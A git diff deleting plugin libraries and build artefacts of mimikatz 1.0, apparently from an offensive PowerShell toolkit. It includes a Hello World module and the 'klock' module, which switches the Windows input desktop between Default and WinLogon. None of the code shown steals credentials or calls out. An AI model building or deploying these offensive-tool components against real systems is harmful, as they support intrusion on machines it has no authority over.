--git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/rc.command.1.tlog Binary files differdeleted file mode 100644 index fb31489..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/rc.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/rc.read.1.tlog Binary files differdeleted file mode 100644 index 811b6f9..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/rc.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/rc.write.1.tlog Binary files differdeleted file mode 100644 index 30d54de..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/rc.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.cpp b/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.cpp deleted file mode 100644 index d49a183..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.cpp +++ /dev/null @@ -1,12 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "kelloworld.h" - -__kextdll bool __cdecl helloworld(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - MessageBox(NULL, L"Hello World!", MIMIKATZ_FULL, MB_ICONINFORMATION | MB_OK); - return true; -} diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.h b/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.h deleted file mode 100644 index daa8973..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.h +++ /dev/null @@ -1,9 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "kmodel.h" - -__kextdll bool __cdecl helloworld(mod_pipe * monPipe, vector<wstring> * mesArguments); diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.rc b/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.rc Binary files differdeleted file mode 100644 index 312b232..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.rc +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.vcxproj b/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.vcxproj deleted file mode 100644 index b0b3674..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.vcxproj +++ /dev/null @@ -1,121 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup Label="ProjectConfigurations"> - <ProjectConfiguration Include="Release|Win32"> - <Configuration>Release</Configuration> - <Platform>Win32</Platform> - </ProjectConfiguration> - <ProjectConfiguration Include="Release|x64"> - <Configuration>Release</Configuration> - <Platform>x64</Platform> - </ProjectConfiguration> - </ItemGroup> - <PropertyGroup Label="Globals"> - <ProjectGuid>{D0ABA26B-0C4F-41F0-8F3C-7F5EFE3C50C6}</ProjectGuid> - <Keyword>Win32Proj</Keyword> - <RootNamespace>kelloworld</RootNamespace> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> - <ImportGroup Label="ExtensionSettings"> - </ImportGroup> - <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <PropertyGroup Label="UserMacros" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - </PropertyGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader>NotUsing</PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KELLOWORLD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <ErrorReporting>None</ErrorReporting> - </ClCompile> - <Link> - <SubSystem>Windows</SubSystem> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>user32.lib</AdditionalDependencies> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - </Link> - </ItemDefinitionGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader>NotUsing</PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KELLOWORLD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <ErrorReporting>None</ErrorReporting> - </ClCompile> - <Link> - <SubSystem>Windows</SubSystem> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>user32.lib</AdditionalDependencies> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - </Link> - </ItemDefinitionGroup> - <ItemGroup> - <ClCompile Include="..\..\commun\kmodel.cpp" /> - <ClCompile Include="..\..\modules\mod_parseur.cpp" /> - <ClCompile Include="..\..\modules\mod_pipe.cpp" /> - <ClCompile Include="kelloworld.cpp" /> - </ItemGroup> - <ItemGroup> - <ClInclude Include="..\..\commun\kmodel.h" /> - <ClInclude Include="..\..\modules\mod_parseur.h" /> - <ClInclude Include="..\..\modules\mod_pipe.h" /> - <ClInclude Include="kelloworld.h" /> - </ItemGroup> - <ItemGroup> - <ResourceCompile Include="kelloworld.rc" /> - </ItemGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> - <ImportGroup Label="ExtensionTargets"> - </ImportGroup> -</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.vcxproj.filters b/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.vcxproj.filters deleted file mode 100644 index 4271331..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/kelloworld.vcxproj.filters +++ /dev/null @@ -1,44 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup> - <ClCompile Include="kelloworld.cpp" /> - <ClCompile Include="..\..\modules\mod_pipe.cpp"> - <Filter>Modules Communs\Communication</Filter> - </ClCompile> - <ClCompile Include="..\..\modules\mod_parseur.cpp"> - <Filter>Modules Communs\Parseur</Filter> - </ClCompile> - <ClCompile Include="..\..\commun\kmodel.cpp"> - <Filter>Modules Communs\Librairie Modèle</Filter> - </ClCompile> - </ItemGroup> - <ItemGroup> - <ClInclude Include="kelloworld.h" /> - <ClInclude Include="..\..\modules\mod_pipe.h"> - <Filter>Modules Communs\Communication</Filter> - </ClInclude> - <ClInclude Include="..\..\modules\mod_parseur.h"> - <Filter>Modules Communs\Parseur</Filter> - </ClInclude> - <ClInclude Include="..\..\commun\kmodel.h"> - <Filter>Modules Communs\Librairie Modèle</Filter> - </ClInclude> - </ItemGroup> - <ItemGroup> - <Filter Include="Modules Communs"> - <UniqueIdentifier>{78bbda7e-d41f-4f1c-8aab-9b9471b30a56}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Communication"> - <UniqueIdentifier>{314aff70-fe34-4afa-9341-0ad0a9a9a735}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Parseur"> - <UniqueIdentifier>{86a68fa7-1f11-48c7-9821-f5c8bf8b6724}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Librairie Modèle"> - <UniqueIdentifier>{7790e784-5bb7-405d-8bc7-0a3f5351245b}</UniqueIdentifier> - </Filter> - </ItemGroup> - <ItemGroup> - <ResourceCompile Include="kelloworld.rc" /> - </ItemGroup> -</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/CL.read.1.tlog Binary files differdeleted file mode 100644 index bcd26b3..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/CL.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/CL.write.1.tlog Binary files differdeleted file mode 100644 index 73eaec6..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/CL.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/cl.command.1.tlog Binary files differdeleted file mode 100644 index 5cef6b9..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/cl.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.dll.intermediate.manifest b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.dll.intermediate.manifest deleted file mode 100644 index ecea6f7..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.dll.intermediate.manifest +++ /dev/null @@ -1,10 +0,0 @@ -<?xml version='1.0' encoding='UTF-8' standalone='yes'?> -<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> - <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> - <security> - <requestedPrivileges> - <requestedExecutionLevel level='asInvoker' uiAccess='false' /> - </requestedPrivileges> - </security> - </trustInfo> -</assembly> diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.lastbuildstate b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.lastbuildstate deleted file mode 100644 index 4d28193..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.lastbuildstate +++ /dev/null @@ -1,2 +0,0 @@ -#v4.0:v100 -Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\| diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.res b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.res Binary files differdeleted file mode 100644 index 3104953..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.res +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.write.1.tlog deleted file mode 100644 index 3cfbe7b..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/klock.write.1.tlog +++ /dev/null @@ -1,5 +0,0 @@ -^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\librairies\klock\klock.vcxproj -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\klock.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\klock.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\klock.exp -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\klock.exp diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link-cvtres.read.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link-cvtres.read.1.tlog +++ /dev/null @@ -1 +0,0 @@ -
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link-cvtres.write.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link-cvtres.write.1.tlog +++ /dev/null @@ -1 +0,0 @@ -
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link.command.1.tlog Binary files differdeleted file mode 100644 index 966e3ca..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link.read.1.tlog Binary files differdeleted file mode 100644 index 118ff20..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link.write.1.tlog Binary files differdeleted file mode 100644 index ed695be..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/link.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/mt.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/mt.command.1.tlog Binary files differdeleted file mode 100644 index 96b5f5a..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/mt.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/mt.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/mt.read.1.tlog Binary files differdeleted file mode 100644 index 6e3ab6c..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/mt.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/mt.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/mt.write.1.tlog Binary files differdeleted file mode 100644 index df7edcc..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/mt.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/rc.command.1.tlog Binary files differdeleted file mode 100644 index 055dfdc..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/rc.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/rc.read.1.tlog Binary files differdeleted file mode 100644 index ee2aaa1..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/rc.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/klock/Win32/rc.write.1.tlog Binary files differdeleted file mode 100644 index a07a6d6..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/Win32/rc.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/klock.cpp b/Exfiltration/mimikatz-1.0/librairies/klock/klock.cpp deleted file mode 100644 index 9717c49..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/klock.cpp +++ /dev/null @@ -1,97 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "klock.h" - -__kextdll bool __cdecl getDescription(wstring * maDescription) -{ - maDescription->assign(L"kLock : librairie de manipulation des bureaux"); - return true; -} - -bool getNameOfDesktop(HDESK desktop, wstring &bureau) -{ - bool resultat = false; - - wchar_t * monBuffer; - DWORD tailleRequise = 0; - - if(!GetUserObjectInformation(desktop, UOI_NAME, NULL, 0, &tailleRequise) && (tailleRequise > 0)) - { - monBuffer = new wchar_t[tailleRequise]; - if(resultat = (GetUserObjectInformation(desktop, UOI_NAME, monBuffer, tailleRequise, &tailleRequise) != 0)) - { - bureau.assign(monBuffer); - } - delete[] monBuffer; - } - return resultat; -} - -__kextdll bool __cdecl echange(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wstringstream maReponse; - wstring source, cible, monBureau; - bool modeFullAuto = true; - - if(mesArguments->size() == 2) - { - modeFullAuto = false; - source = mesArguments->front(); - cible = mesArguments->back(); - } - - if (HDESK hOriginalDesktop = OpenInputDesktop(0, FALSE, GENERIC_READ | DESKTOP_SWITCHDESKTOP)) - { - if(getNameOfDesktop(hOriginalDesktop, monBureau)) - { - maReponse << L"Bureau courant : " << monBureau << endl; - - if((_wcsicmp(monBureau.c_str(), source.c_str()) == 0) || modeFullAuto) - { - if(modeFullAuto) - cible = _wcsicmp(monBureau.c_str(), L"Default") == 0 ? L"WinLogon" : L"Default"; - - maReponse << L"Bureau cible : " << cible << endl; - - if (HDESK hNewDesktop = OpenDesktop(cible.c_str(), 0, FALSE, DESKTOP_SWITCHDESKTOP)) - { - if (SwitchDesktop(hNewDesktop)) - maReponse << L"Switch du bureau russi !"; - else - maReponse << L"Erreur : impossible de basculer le bureau ; SwitchDesktop : " << mod_system::getWinError(); - maReponse << endl; - CloseDesktop(hNewDesktop); - } - else maReponse << "Erreur : impossible d\'ouvrir le bureau cible (" << cible << L") ; OpenDesktop : " << mod_system::getWinError(); - } - else if(!modeFullAuto) - maReponse << L"Erreur : le bureau courant (" << monBureau << L") ne correspond pas au bureau source indiqu (" << source << L")" << endl; - } - else maReponse << L"Erreur : impossible d\'obtenir le nom du bureau courant ; getNameOfDesktop : " << mod_system::getWinError() << endl; - - CloseDesktop(hOriginalDesktop); - } - else maReponse << L"Erreur : impossible d\'ouvrir le bureau courant ; OpenInputDesktop : " << mod_system::getWinError() << endl; - - return sendTo(monPipe, maReponse.str()); -} - -__kextdll bool __cdecl getDesktop(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wstringstream maReponse; - wstring monBureau; - - if (HDESK hDesktop = OpenInputDesktop(0, FALSE, GENERIC_READ)) - { - if(getNameOfDesktop(hDesktop, monBureau)) - maReponse << L"Bureau courant : " << monBureau << endl; - else - maReponse << L"Erreur : impossible d\'obtenir le nom du bureau courant ; getNameOfDesktop : " << mod_system::getWinError() << endl; - - CloseDesktop(hDesktop); - } - return sendTo(monPipe, maReponse.str()); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/klock.h b/Exfiltration/mimikatz-1.0/librairies/klock/klock.h deleted file mode 100644 index e6ea046..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/klock.h +++ /dev/null @@ -1,14 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "kmodel.h" -#include "mod_system.h" - -__kextdll bool __cdecl getDescription(wstring * maDescription); - -bool getNameOfDesktop(HDESK desktop, wstring &bureau); -__kextdll bool __cdecl echange(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl getDesktop(mod_pipe * monPipe, vector<wstring> * mesArguments);
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/klock.rc b/Exfiltration/mimikatz-1.0/librairies/klock/klock.rc Binary files differdeleted file mode 100644 index 28599d2..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/klock.rc +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/klock.vcxproj b/Exfiltration/mimikatz-1.0/librairies/klock/klock.vcxproj deleted file mode 100644 index a93a79d..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/klock.vcxproj +++ /dev/null @@ -1,131 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup Label="ProjectConfigurations"> - <ProjectConfiguration Include="Release|Win32"> - <Configuration>Release</Configuration> - <Platform>Win32</Platform> - </ProjectConfiguration> - <ProjectConfiguration Include="Release|x64"> - <Configuration>Release</Configuration> - <Platform>x64</Platform> - </ProjectConfiguration> - </ItemGroup> - <PropertyGroup Label="Globals"> - <ProjectGuid>{6556249E-1C80-4047-A863-F608C8B8AC55}</ProjectGuid> - <Keyword>Win32Proj</Keyword> - <RootNamespace>klock</RootNamespace> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> - <ImportGroup Label="ExtensionSettings"> - </ImportGroup> - <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <PropertyGroup Label="UserMacros" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - </PropertyGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader>NotUsing</PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KLOCK_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <ErrorReporting>None</ErrorReporting> - </ClCompile> - <Link> - <SubSystem>Windows</SubSystem> - <GenerateDebugInformation>false</GenerateDebugInformation> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>user32.lib;shlwapi.lib;secur32.lib</AdditionalDependencies> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - </Link> - <ResourceCompile> - <Culture>0x040c</Culture> - </ResourceCompile> - </ItemDefinitionGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader>NotUsing</PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KLOCK_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <ErrorReporting>None</ErrorReporting> - </ClCompile> - <Link> - <SubSystem>Windows</SubSystem> - <GenerateDebugInformation>false</GenerateDebugInformation> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>user32.lib;shlwapi.lib;secur32.lib</AdditionalDependencies> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - </Link> - <ResourceCompile> - <Culture>0x040c</Culture> - </ResourceCompile> - </ItemDefinitionGroup> - <ItemGroup> - <ResourceCompile Include="klock.rc" /> - </ItemGroup> - <ItemGroup> - <ClCompile Include="..\..\commun\kmodel.cpp" /> - <ClCompile Include="..\..\modules\mod_parseur.cpp" /> - <ClCompile Include="..\..\modules\mod_pipe.cpp" /> - <ClCompile Include="..\..\modules\mod_system.cpp" /> - <ClCompile Include="klock.cpp" /> - </ItemGroup> - <ItemGroup> - <ClInclude Include="..\..\commun\kmodel.h" /> - <ClInclude Include="..\..\modules\mod_parseur.h" /> - <ClInclude Include="..\..\modules\mod_pipe.h" /> - <ClInclude Include="..\..\modules\mod_system.h" /> - <ClInclude Include="klock.h" /> - </ItemGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> - <ImportGroup Label="ExtensionTargets"> - </ImportGroup> -</Project>
